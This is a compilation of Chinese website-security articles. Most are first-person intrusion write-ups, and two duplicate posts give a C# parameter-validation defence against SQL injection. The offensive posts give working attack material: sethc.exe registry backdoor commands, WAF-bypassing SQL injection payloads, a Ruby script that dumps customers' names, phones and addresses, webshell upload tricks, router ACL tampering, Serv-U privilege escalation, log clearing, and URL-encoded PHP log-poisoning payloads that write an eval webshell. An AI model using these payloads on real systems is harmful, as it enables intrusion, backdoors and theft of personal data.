“MEMO”通过精心收集,向本站投稿了10篇3389新思路 SQL渗透的一些技术网站安全,下面是小编精心整理后的3389新思路 SQL渗透的一些技术网站安全,仅供参考,大家一起来看看吧。
- 目录
篇1:3389新思路 SQL渗透的一些技术网站安全
渗透的时候拿到了权限,如何通过SQL语句进行渗透提权,本文主要介绍了一些方法,目标:
1、能修改注册表
2、能访问3389
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_sz','c:\\windows\\system32\\cmd.exe on';--
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_sz','';--
REG ADD “HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe” /v debugger /t REG_sz /d “c:\\windows\\system32\\cmd.exe” on /f
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethcasd.exe]
“debugger”=“c:\\\\windows\\\\system32\\\\cmd.exe on”
regedit
/s 导入 .reg 文件进注册表(安静模式)
/e 导出注册表文件
例:regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM
magnify.exe
osk.exe
sethc.exe
篇2:某商业网站渗透分析网站安全
本次渗透分析仅针对WEB系统,考虑其他方面并没有直接可攻破的点
平台: Windows 2003 MSSQL 2000 IIS 6.0 测试层面: WEB应用程序-动易2006
由于本人对动易2006并不熟悉,虽然通过GOOGLE查了很多相关的漏洞信息,但是那些漏洞的发布日期已经有4,5年的历史了,只好先整体看看这个WEB的结构,通过首页发现除了注册和登录那里可以到有ASP脚本的踪迹外,其他地址都已经转换成了静态页面,于是注册一个测试帐号,登录进去,里面有些相关帐号信息设置和订单信息的项目,但是在帐号信息设置里没有发现比较明显可以造成漏洞的提交点,这个时候要变换思路了.
重新查看首页,中上部有一个搜索功能,于是马上提交一个单引号,测试返回结果令人振奋,结果如下:
Microsoft OLE DB Provider for SQL Server错误 '80040e14'
字符串 ' order by Hits desc' 之前有未闭合的引号,
/shop/proclass.asp,行 629
这该不会是WEB开发人员自己添加的功能吧,还是动易2006的功能,按道理动易2006经历了这么多的风风雨雨不会犯下愚蠢的错误的,这仅仅是一个猜测,我还没有下载源代码或者看代码文档作出合理判断。
但不管怎么说,这个SQL注入点是一个好兆头,既然是注入点,当然要测试一下一些基本的SQL语句,看能否得到一个敏感信息,于是提交‘ and 1=user--,结果返回空白页面,奇怪。。。难道有过滤?使用比较少见的’ having 1=1--有了返回结果,但是提示语法错误,可以肯定该WEB系统装了类似WAF或者有脚本过滤功能,搜索功能是通过POST提交参数,而且如果想通过自动化工具利用的话,也得抓包分析出其中的提交参数,于是乎请出WinSockExpert,得到路径和参数信息后,先用IE测试一下,结果令人很失望,GET方式过滤的比POST要更加严格,就连单引号已经被过滤,汗。。。填到NBSI里,不论是GET还是POST方式运行都提示错误,看来这个搜索功能的SELECT WERE有不可告人的语法哦,先放一边。
既然有此物也会有彼物的,请出伟大的GOOGLE帮忙吧,site:xxx.com filetype:asp,不错,有很多ASP的连接,其中www.xxxx.com/Shop/ShowTrademark.asp?ChannelID=100&SpecialID=4这个连接是最抢眼的,放入IE,在SpecialID=4之后加单引号,返回到首页,%100的肯定了有SQL注入过滤功能,但是别忘记POST是不能过滤的太严格的,不然用户也要提交一些有特殊符号的内容的,这就是我要钻空子的地方了,接下来用到了JCZ的注入工具,为啥用它呢,因为作者比较厚道,提供了一个查看DEBUG信息和一个自己构造SQL语句功能,可想而知作者是多么希望使用他工具的人不仅仅是会用工具,还是能理解原理的人。
在JCZ中,运行的结果出现了该WEB应用程序的数据库连接帐号是SA权限,支持多语句,数据库名,用户名一些基本信息,但是在进行到测试表名的时候出现了错误,说明被过滤功能阻挡了,怎么办???仅仅这些基本的信息是万万不能有啥突破的。
接下来通过查看JCZ的DEBUG信息,大概猜测过滤了哪些SQL语句,那么就要想办法绕过限制,JCZ的RunSQL功能是一个很好尝试的地方,单独的SELECT是无法执行了,于是想到了uion select的方式,测试结果是理想的,成功的绕过了限制,构造语句如下:/**/and/**/1=2/**/union%20all select%201,2,3,password,5,'a',7,8,9,10,11,'b',13 from PE_Admin—此语句的构造过程一波三折,首先字段数量不难点,纯属体力活,但是中间的几个字段注意类型,如果与前面SQL语句的类型不匹配就会发生错误,另外还有union 后面的all,如果不加会发生如下错误:不能以 distinct 方式选择 text、ntext 或 image 数据类型,这说明了在前面的SELECT语句后使用了DISTINCT的限制关键词
语法解释:SQL SELECT DISTINCT 语句,在表中,可能会包含重复值。这并不成问题,不过,有时您也许希望仅仅列出不同(distinct)的值。
关键词 DISTINCT 用于返回唯一不同的值,UNION 和 UNION ALL的区别,UNION在进行表链接后会筛选掉重复的记录,所以在表链接后会对所产生的结果集进行排序运算,删除重复的记录再返回结果。
而UNION ALL只是简单的将两个结果合并后就返回。这样,如果返回的两个结果集中有重复的数据,那么返回的结果集就会包含重复的数据了,了解语法后就很容易理解为什么要用union all了,因为关键词DISTINCT和UNION都有相同的取出重复值的功能,一起共处难免会让MSSQL难堪的:)
好了,通过上面语句我得到了后台管理员的用户名和密码,这里用XXX表示,那么就找后台路径去登录了,这里又是一个难点,我试过了常用的路径名,甚至动用了扫路径工具都无功而返,郁闷啊,思考好久,不如先放下?!看看这个IP绑定有哪些WEB吧,运气不错,有4个,其中一个WEB也使用动易2006,但是观察页面,和xxx不同的是,我根本看不到注册和登录的连接,于是通过xxx的路径信息,访问到了这个站的注册页面和登录页面,比较幸运的是,在我注册登录进去以后,在最下边发现了,后台管理的连接地址,根据这个地址我折回xxx访问后台,BINGO,原来这个服务器的WEB应用是同一个人或者组织维护的
但我满怀欣喜打开xxx的后台,正好登录的时候发现,在密码框之后还有一个管理员认证码,本来以为不就一个认证码嘛,我再注入得到就好了,但是通过查找动易文档,此管理认证码写到一个固定的配置文件中,只能有管理员才可查看和修改,一座大山突然出现在了我面前
痛苦之余,想了点别的,既然通过别的站点得到后台路径信息,那么可否通过xxx的注入点路径信息得到别的站点的管理员密码呢,但我访问的时候,又一次被深深的打击了一下,结果如下:对不起,你的服务器没有安装动易组件(PE_Common6.dll),所以不能使用动易系统。请和你的空间商联系以安装动易组件。
不能说一点收获也没有,至少我知道这个注入点是动易2006的一个组件造成的!
都已经可以执行SQL语句了,怎么可以就这样放弃,除了SELECT,我认为最好可以执行UPDATE,因为有这样一个事实:在基于WINDOWS 2003系统上,IIS6.0中,如果WEB路径的名字是一个X.ASP,那么在这个路径之下的所有任意类型的文件都会被当作ASP脚本解析,而且我查了动易2006有过这么一个漏洞,漏洞的要点在注册用户名的时候,没有过滤特殊字符点,导致可以注册一个X.ASP的用户名,然后通过访问user/Upload.asp?dialogtype=UserBlogPic&size=5,可以上传允许扩展名类型的文件上去,但内容可以是ASP类型的WEBSHELL,上传成功后,查看源代码,可以找到上传文件的路径信息。
这个事实阐述还是蛮长的,但是我眼前这个动易2006已经早就有了补丁,只允许字母和数字做为用户名,才能注册成功,但是如果我可以UPDATE更新我的用户名称X.ASP也可以达到目的吗,这叫间接实现老漏洞,呵呵,但我第一次构造好语句:;update/**/PE_USER/**/set/**/username='x.asp' where userid=xxx—提交后,HTTP返回无内容,又一次被过滤了,通过测试本地的MSSQL2000,update关键词是没办法拆分的,如果利用EXE(@sql),然后将@sql里用十六进制加密呢,通用过滤declare,cast,varchar等等所必需的元素,这条路也走不通,如果在update之前也加个/**/会怎么样呢,第二次构造好语句:;/**/update/**/PE_USER/**/set/**/username='x.asp' where userid=xxxx—哈哈,有内容返回了,我相信已经更新成功,但我再次通过邮箱登录该帐号以后,在帐号信息了,发现用户名已经是x.asp了,非常的不错,我上传了一个很小的WEBSHELL,为了过愚蠢的图片验证机制,开头加GIF89a,上传成功,查看源代码,又一座大山出现在我面前;路径是有x.asp了,但是后面竟然有5个数字,仔细一看,正好是我的userid,破坏了我当初想的通过x.asp执行WEBSHELL的思路了,我很佩服动易的开发人员,为了程序安全,增加了很多安全机制在里面,下面代码是通过注入点得到所有订单用户的敏感信息:
测试代码 Httpsql.rb:
Code:[Copy to clipboard]
require 'uri'
require 'net/http'
require 'socket'
require 'iconv'
class Httpsql
def initialize(url)
@url = url
@uri = URI.parse(@url)
@i = 5
end
def Postsql(sqlstr, userid, startid=1)
http = Net::HTTP.new(@uri.host, @uri.port)
headers = {
'Content-Type' =>'application/x-www-form-urlencoded'
}
(startid..userid.to_i).step(1) do |id|
print “#” + id.to_s
params_1 = sprintf(sqlstr, “Username”, “ContacterName”,id)
params_2 = sprintf(sqlstr, “Mobile”, “Phone”,id)
params_3 = sprintf(sqlstr, “ZipCode”, “Address”, id)
begin
resp_1 = http.post(@uri.path, params_1, headers)
self.wirtelog(resp_1, “1”)
resp_2 = http.post(@uri.path, params_2, headers)
self.wirtelog(resp_2, “2”)
resp_3 = http.post(@uri.path, params_3, headers)
self.wirtelog(resp_3, “3”)
rescue
@i += 1
sleep(@i);
retry
end
sleep(@i);
end
end
def wirtelog(resp, flag)
#puts resp.body
file = File.new(“userinfo.txt”, “a”)
if resp.body =~ /^
(.*?)
if flag == “1”
file.puts “============================================================”
file.puts “网站用户名: ” + $1
elsif flag == “2”
file.puts “手机号: ” + $1
else
file.puts “邮政编码: ” + $1
end
end
if resp.body =~ /
(.*?)<\\/P>/
if flag == “1”
file.puts “真名: ” + $1
elsif flag == “2”
file.puts “座机: ” + $1
else
file.puts “联系地址: ” + $1
file.puts “============================================================”
end
end
file.close
end
end
if __FILE__ == $0
sqlsend = Httpsql.new(“www.xxx.com/Shop/ShowTrademark.asp”)
sqlstr = “?ChannelID=100&SpecialID=4/**/and/**/1=2/**/union/**/all/**/select/**/1,2,3,%s,5,'无',7,8,9,10,11,%s,13/**/from/**/PE_OrderForm/**/where/**/ClientID=%s--”
sqlsend.Postsql(sqlstr, ARGV[1],ARGV[0].to_i)
end
篇3:渗透荆门市的门户网站网站安全
现在入侵网站没以前那么简单了,在注入漏洞和上传漏洞刚出现的时候,用这两种方法入侵网站的成功率是最高的,有将近70%左右的网站都可以利用注入漏洞和上传漏洞轻松搞定,注入漏洞在国内流行差不多二年多了,只要是做网站维护和服务器管理的人,几乎都知道什么是注入漏洞,而且利用通用防注入脚本可以轻松堵住有注入点的网站,用法简单,网上到处都有下载。现在入侵网站不再是拿出一个注入工具,点几下鼠标就行了,所以我们入侵的思路也要改变一下,平常也要多积累各种程序的漏洞,入侵的时候一定会更加顺手、更加顺利。接下来,大家就和我一起进入今天的渗透过程吧!
寻找漏洞篇
荆网,荆门市的门户网站,首页上有二手供求、房产信息、图书影视、人才招聘、社区等20几个栏目。新闻系统全部是静态页面,注入是不可能的,后台好像也被修改了,用扫描后台的工具扫了一遍,没有结果,用Google搜索也没找出来,看来我们只能从其它的方面入手了。
一般的大型网站都有自己的流量统计程序,方便管理员和网站经营者查看网站的流量,为网站推广提供一定的依据。下面,我们来找找看荆网有没有自己的统计程序,用Google搜索site:cnjm.cn inurl:count,如图1所示。
荆网果然有自己的统计程序,还是IT学习者网站访问统计系统。前段时间,这套程序暴出了后台拿WebShell的漏洞,但前提是要拿到管理员密码。一般这种门户网站,管理员都会改密码的,先试下看看吧。这套程序的默认密码是ITlearner,在密码处输入ITlearner,返回密码错误,果然改密码了。习惯性地试了下网站的域名cnjm,竟然成功进去了,如图2所示。
拿WebShell篇
马上到网上下载了一套IT学习者网站访问统计程序,
利用这套程序的漏洞拿WebShell,网上有很多教程,但是我还没有拿过,先在本机上搭建好程序的运行环境,然后再按网上讲的方法进行测试。一般有什么漏洞出来,最好是自己下载一套程序,在本机上测试,只有先拿下自己机子上的程序,才可能顺利拿到服务器上的程序,自己在本机测试也会对程序的漏洞理解更深,有助于我们进一步学习。在本机测试成功拿到WebShell后,我明白这套程序会把修改配置的内容写入config.asp文件,只要我们在修改配置里插入一句话木马就可以搞定了,因为修改配置里限制了文本框的大小,所以我们要把源代码保存一下。搜索“默认为100条”关键字,把这行文本框的maxlength的值修改为100,value的值修改为“100%>
拿服务器篇
成功连接后,我上传了老兵的站长助手,先看看服务器的权限设得如何,如图4所示。Wscript.shell和FSO组件都能用,而且C盘还可以浏览,应该可以拿下来。上传net.exe和netstat.exe两个工具到C:\\Documents and Settings\\All Users\\Documents目录下,这个目录默认是everyone完全控制的。查看了一下端口列表,3389终端端口开了,还有Serv-U的本地43958端口。在本地用FTP连接,发现Serv-U是6.0版的,而且3389也可以成功连接。了解了这些情况,现在我们只要加个管理员就行了。上传Serv-U的本地提权工具,马上加了一个管理员,用远程桌面连接器成功登录,如图5所示。
IIS管理器把网站全部显示出来了,主站www.cnjm.cn也在其中。到此为止,这次渗透就成功完成了,拿下了荆网的服务器。接下来,删除账号,清除日志,然后给管理员留了言,我就下了。
渗透总结
这次入侵,我利用一个统计程序的小漏洞就轻松搞定了一个市的门户网站。管理员们要注意了,在使用密码的时候,不要用过于简单,用域名做密码,别人一猜就能猜出来,你方便了,那入侵者就更方便了!
篇4:渗透某知名公司内部网络网站安全
这个网络很大共有七个网管,现在当前位置是F网、朋友在B网、目标在A网,
朋友给的资料,目前接入internet的两台设备未知(假设未知的设备都是路由器),图2是该公司大体的网络拓扑图。掌握B网所有设备用户名密码(朋友之前嗅探到的)。除A网其它网络可以自由通信, A网内有公司重要信息所以不像其它网,它是不允许任何人访问的,路由不给予转发数据,也就是只进不出的网络,虽然现在的网络是外紧内松,但是想进入目标主 机还是有些难度。怎么跨过设备的限制到达目标呢!您还要向下看。现在首要的目的就是让router3给我们转发数据包。
首先尝试telnet登录路由,拒绝访问不能登录,我想也不能登录,应该是访问控制列表限制了。
现在我们首要目标拿下router3的控制权,为什么目标定位在router3呢!
我们现在知道他的登录密码;
我当前位置可以和B网直接通信;
Router3是A、B网络公用的,应该两个网管都有权限登录;
这一点也是最重要的,只有router3给予数据转发才可以和目标主机通信;
个人认为router3是最佳路线,现在假设一下,如果B网管理员所管理的设备只有他本身所用的IP或TFTP Server(兼DHCP Server)才可以登录设置,那么有如下思路可以完成入侵。一般来说管理员主机一定可以登录这台路由器的,网管主机都不可以登录设备那么谁为维护网络 呢!
1、直接得到B网管理员主机的一个CMDShell来登录设备。
2、得到管理员同网段一台主机的CMDShell,从而利用ARP欺骗来telnet目标路由。
3、得到B网其它网段中可访问外部网络一台主机的CDM Shell,伪装CDM Shell主机IP地址,必要情况伪装IP+MAC地址来欺骗路由器,(机会高达到50%)。
经过分析拿B网的DHCP服务器(172.16.101.25)开始,选择突破点也是很重要的,DHCP服务器为了提供这个网段的服务他是暴露在相对 外部的,而且不在VLAN的管辖中,还和网管在同一交换机下,而且听朋友说他们公司PC几乎不打补丁,还有很多员工不知补丁为何物,这也给入侵带来及大 的方便。利用服务器的WEB木马上传一些流行的溢出程序,直接拿个溢出程序溢出他的DHCP服务器,(最后才知道的溢出程序对这个主机都有 用)成功得到一个System权限的CMDShell。
革命尚未成功,同志们还须努力啊!“下载”我们肉鸡一个反弹的木马,我们的肉鸡是不能主动连接DHCP服务的,好像有点费话。现在这个主机就是我们在 内网的一个接入点,放弃我们刚才控制的那个WEB主机,利用反弹木马开的个CMD。telnet一下路由,%connection closed by remote host!还是连接失败,不能登录路由器,看样只有172.16.101.15这台主机(管理员IP)可以登录了,我们看一下登录他的交换机OK不(一般 工作组交换机权限设置不会那么BT)。
telnet 172.16.101.253 //交换机管理地址
Password:
center>enable
Password:
成功登录,show mac-access、show cdp neighbors、show arp一些命令判断管理员对应的结口,管理员的IP对应的是FastEthernet 7/1,这个时候要用到IP地址的欺骗,在此感谢EST长的最难看的哥哥。
#interface FastEthernet 7/1
#shutdown
当然,这要等网管离开的时候才可以,这就要内外结合了。这个时候172.16.101.15这台主机在网络上以消失了,我们试一下路由是否允许网管的主机登录,把自己的IP改成172.16.101.15,输入:
netsh >interface ip
netsh interface ip >dump看一下接口配置信息
netsh interface ip >set address name = ″本地连接″ source = static addr = 172.16.101.15 mask = 255.255.255.0
这时候当前主机地址改为172.16.101.15,现在这个主机会和我断掉,但只是一小会,我们的反弹木马一会就能上线。一般重新变改IP地址要发 个ARP包告诉网络其它主机,大概意思是我的IP是172.16.101.15,MAC地址是00-00-00-00-12-34,以后有发往 172.16.101.15地址的数据包都有我来响应。交换机刷新地址表后这台主机伪装成功。在telnet登录路由器,如图2
show running-config看一下配置信息,把路由配置信息COPY到记事本在分析,找到如下配置信息。
access-list 99 172.16.8.88 0.0.0.0 //A网管理员地址
access-list 99 172.16.101.15 0.0.0.0
访问列表99限制只有以上两个IP可以登录路由,看来是这个家伙在作怪,
删除99访问列表,在添加99访问列表:
#access-list 99 172.16.68.88 0.0.0.0
#access-list 99 172.16.101.15 0.0.0.255 //改成172.16.101.0/24网段都可以登录
#line vty 0 4
#access-class 99 in
退出路由系统,把自己IP改回来,把交换机设置也改回来以免网管回来被发现。
center(config)#interface FastEthernet 7/1
center(config-if)#no shutdown
简单的清理一下留下的痕迹,退出他们的网络来分析一下网管是怎么配置的路由,在路由配置信息中有几条重要信息。
ip nat pool NO.1027 10.255.200.1 10.255.200.105 netmask 255.255.255.0
ip nat inside source list 10 pool NO.1027 overload
access-list 10 permit 172.16.7.0 0.0.0.255
access-list 10 permit 172.16.8.0 0.0.0.255
……
router eigrp 10
真是不敢恭维网管的技术,一条访问列表可以搞定的事,非要分成N个访问列表来描述。到这时才明白为什么朋友不能访问目标主机,因为A网边界路由器为其 作NAT的地址转换,将B类地址转换成A类地址,并且有访问列表限制。现在要使当前主机和目标主机在“堡垒”中建立一条专用的“线路”。我这对路由的配 置不是很熟悉,也不敢太多的尝试,以免被网管发现,但是我们可以“重新”配置一下他的eigrp协议,使内部的地址完全暴露在外边,但此办法太容易让网 管发现,但是当时没想出别的办法来。
#clear ip nat translation *
#no ip nat inside source list 10 pool NO.1027 overload
#no …… //去掉他的访问列表及NAT配置信息
#router eigrp 10
(config-router)#network 172.16.2.0 0.0.0.255
(config-router)#network 172.16.3.0 0.0.0.255
(config-router)#network …… //把所有的网段加进去
#reload 10 //10分钟后设备自动重启
现在路由器就可以为我们转发数据包了,并且在10分钟自动重启使更改的的配置失效,我们现在只差一步就大功告成了,现在须要在我控制的那台主机到目标主机创建一条干线使我们的数据包可以直接到达目标主机。
show cdp neighbors得到如下信息:
Device ID Local Intrfce Holdtme Capability Platform. Port ID
Router3 Fas0/12 176 R 2621 4
在交换机中添加VLAN 13,(目标主机的VLAN号),进入Fas0/12端口, “switchport trunk all vlan add 13 ”,在trunk中添加VLAN13,使这条线路可以通过VLAN13的数据,没有必要改变自己的VLAN号,路由器现在没有访问列表来控制我们的数据 流。这个时候我们ping 172.16.8.120目标主机物理IP地址数据包可以到达了。
这次入侵也接近尾声了,和以前一样还是溢出后安装一个反弹木马,使他可以主动连接我的肉鸡,当然这要在10分钟内搞定,否则要重新进路由改变他重启的 时间,备份他硬盘上的数据,备份肉鸡上的数据,最后就是清理一下入侵的痕迹。这次入侵大约10天才完成,因为要等到特定的时间才可以改变他的网络设备配 置,比如改变路由器的访问列表进一定要等到下班时间,大多用户不使用网络时、而目标主机还在使用网络时、网管还没有关闭设备时,也就是要和网管打个时间 差。
本文经过N次的筛选终于从万字的文章精减出此文,可读性、实用性一定会有不同程度上的衰减,本次入侵没有什么新的技术,主要说怎样绕过内部网络设备的限制,只不过是一些经验的叠加,针对网络设备入侵这也算很初级的。
当时少写了个步骤,少了是不会成功的,仔细看的朋友一定能看出来。
转自无才牛。。。
篇5:网站安全:整站防止SQL注入式入侵
老邪的博客
SQL注入,通常一个一个文件修改不仅麻烦而且还有漏掉的危险,下面我说一下如何从整个系统防止注入,
做到以下三步,相信你的程序就会比较安全了,而且对整个网站的维护也将变的简单。
一、数据验证类
parameterCheck.cs
public class parameterCheck{
public static bool isEmail(string emailString){
return System.Text.RegularExpressions.Regex.IsMatch(emailString, “[’\\\\w_-]+(\\\\.
[’\\\\w_-]+)*@[’\\\\w_-]+(\\\\.[’\\\\w_-]+)*\\\\.[a-zA-Z]{2,4}”);
}
public static bool isInt(string intString){
return System.Text.RegularExpressions.Regex.IsMatch(intString ,“^(\\\\d{5}-\\\\d{4})|
(\\\\d{5})$”);
}
public static bool isUSZip(string zipString){
return System.Text.RegularExpressions.Regex.IsMatch(zipString ,“^-[0-9]+$|^[0-9]
+$”);
}
}二、Web.config
在你的Web.config文件中,在下面增加一个标签,如下:
USzip“ />
其中key是后面的值为“OrderId-int32”等,其中“-”前面表示参数的名称比如:OrderId,后面的int32表示数据类型。
三、Global.asax
在Global.asax中增加下面一段:
protected void Application_BeginRequest(Object sender, EVEntArgs e){
String[] safeParameters = System.Configuration.ConfigurationSettings.AppSettings
[”safeParameters“].ToString.Split(’,’);
for(int i= 0 ;i < safeParameters.Length; i++){
String parameterName = safeParameters[i].Split(’-’)[0];
String parameterType = safeParameters[i].Split(’-’)[1];
isValidParameter(parameterName, parameterType);
}
}
public void isValidParameter(string parameterName, string parameterType){
string parameterValue = Request.QueryString[parameterName];
if(parameterValue == null) return;
if(parameterType.Equals(”int32“)){
if(!parameterCheck.isInt(parameterValue)) Response.Redirect(”parameterError.aspx“);
}
else if (parameterType.Equals(”double“)){
if(!parameterCheck.isDouble(parameterValue)) Response.Redirect(”parameterError.aspx“);
}
else if (parameterType.Equals(”USzip“)){
if(!parameterCheck.isUSZip(parameterValue)) Response.Redirect(”parameterError.aspx“);
}
else if (parameterType.Equals(”email“)){
if(!parameterCheck.isEmail(parameterValue)) Response.Redirect(”parameterError.aspx“);
}
}以后需要修改的时候我们只需要修改以上三个文件,对整个系统的维护将会大大提高效率,当然你可以根据自己的需要增加其它的变量参数和数据类型,
篇6:网站安全:整站如何防止SQL注入方式入侵
防止SQL注入,通常一个一个文件修改不仅麻烦而且还有漏掉的危险,下面我说一下如何从整个系统防止注入,
做到以下三步,相信你的程序就会比较安全了,而且对整个网站的维护也将变的简单。
一、数据验证类
parameterCheck.cs
public class parameterCheck{
public static bool isEmail(string emailString){
return System.Text.RegularExpressions.Regex.IsMatch(emailString, ”[\\w_-]+(\\.
[\\w_-]+)*@[\\w_-]+(\\.[\\w_-]+)*\\.[a-zA-Z]{2,4}“);
}
public static bool isInt(string intString){
return System.Text.RegularExpressions.Regex.IsMatch(intString ,”^(\\d{5}-\\d{4})|
(\\d{5})$“);
}
public static bool isUSZip(string zipString){
return System.Text.RegularExpressions.Regex.IsMatch(zipString ,”^-[0-9]+$|^[0-9]
+$“);
}
}
二、Web.config
在你的Web.config文件中,在下面增加一个标签,如下:
USzip” />
其中key是后面的值为“OrderId-int32”等,其中“-”前面表示参数的名称比如:OrderId,后面的int32表示数据类型。
三、Global.asax
在Global.asax中增加下面一段:
protected void Application_BeginRequest(Object sender, EventArgs e){
String[] safeParameters = System.Configuration.ConfigurationSettings.AppSettings
[“safeParameters”].ToString().Split(,);
for(int i= 0 ;i < safeParameters.Length; i++){
String parameterName = safeParameters[i].Split(-)[0];
String parameterType = safeParameters[i].Split(-)[1];
isValidParameter(parameterName, parameterType);
}
}
public void isValidParameter(string parameterName, string parameterType){
string parameterValue = Request.QueryString[parameterName];
if(parameterValue == null) return;
if(parameterType.Equals(“int32”)){
if(!parameterCheck.isInt(parameterValue)) Response.Redirect(“parameterError.aspx”);
}
else if (parameterType.Equals(“double”)){
if(!parameterCheck.isDouble(parameterValue)) Response.Redirect(“parameterError.aspx”);
}
else if (parameterType.Equals(“USzip”)){
if(!parameterCheck.isUSZip(parameterValue)) Response.Redirect(“parameterError.aspx”);
}
else if (parameterType.Equals(“email”)){
if(!parameterCheck.isEmail(parameterValue)) Response.Redirect(“parameterError.aspx”);
}
}
以后需要修改的时候我们只需要修改以上三个文件,对整个系统的维护将会大大提高效率,当然你可以根据自己的需要增加其它的变量参数和数据类型,
篇7:linux下备份拿shell[渗透]网站安全
关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行,当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。
比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句
你可以
xxx.com/z.php?zizzy=/etc/inetd.conf
xxx.com/z.php?zizzy=/proc/cpuinfo
xxx.com/z.php?zizzy=/etc/passwd
就可以利用包含语句来查看一些系统环境和密码档文件。
那么关于日志包含下面我们来看:
比如我们的Apache的服务器配置文件位置在这里
/usr/local/apache/conf/httpd.conf
那么我们来包含一下httpd.conf,来看下路径信息什么的
xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
读出Apache的配置信息,这里列出部分信息。
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
而我们提交xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以读出Apache的错误日志记录
[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script. /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script. /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script. /home/virtual/www.xxx.com/kkkkkkkk
而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是一样的,一样可以读出来,只不过文件会很大,那也没意思测试下去了,那怎么利用呢。
比如我们提交要提交这句,
在这里,我们只能提交URL编码模式,因为我在测试中发现,
在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的
www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E
这样肯定会报出错找不到页面,而一出错就被记在错误日志里了
xxx.com/z.php?zizzy=/home ... /logs/www-error_log
这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。
如果可以的话(能够执行系统命令,也就是safe_mode开着的时候),
这样子也不错,
/home/
total 9
-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
这样就列出了home下的文件
或者直接一句话木马
这样转换后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 这样的格式。
我们提交
www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E
再用lanker的一句话木马客户端一连就OK了。
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
比如还是这句一句话木马
到这里你也许就想到了,这是个很不错的办法,
接着看,如何写入就成了个问题,用这句,
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入
fclose($fp);?>//在config.php里写入一句木马语句
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志,提交
xxx.com/z.php?zizzy=/home ... /logs/www-error_log
这样webshell就写入成功了,config.php里就写入一句木马语句
OK.
www.xxx.com/forum/config.php这个就成了我们的webshell
直接用lanker的客户端一连,主机就是你的了。
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
其他的日志路径,你可以去猜,也可以参照这里。
附:收集的一些日志路径
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
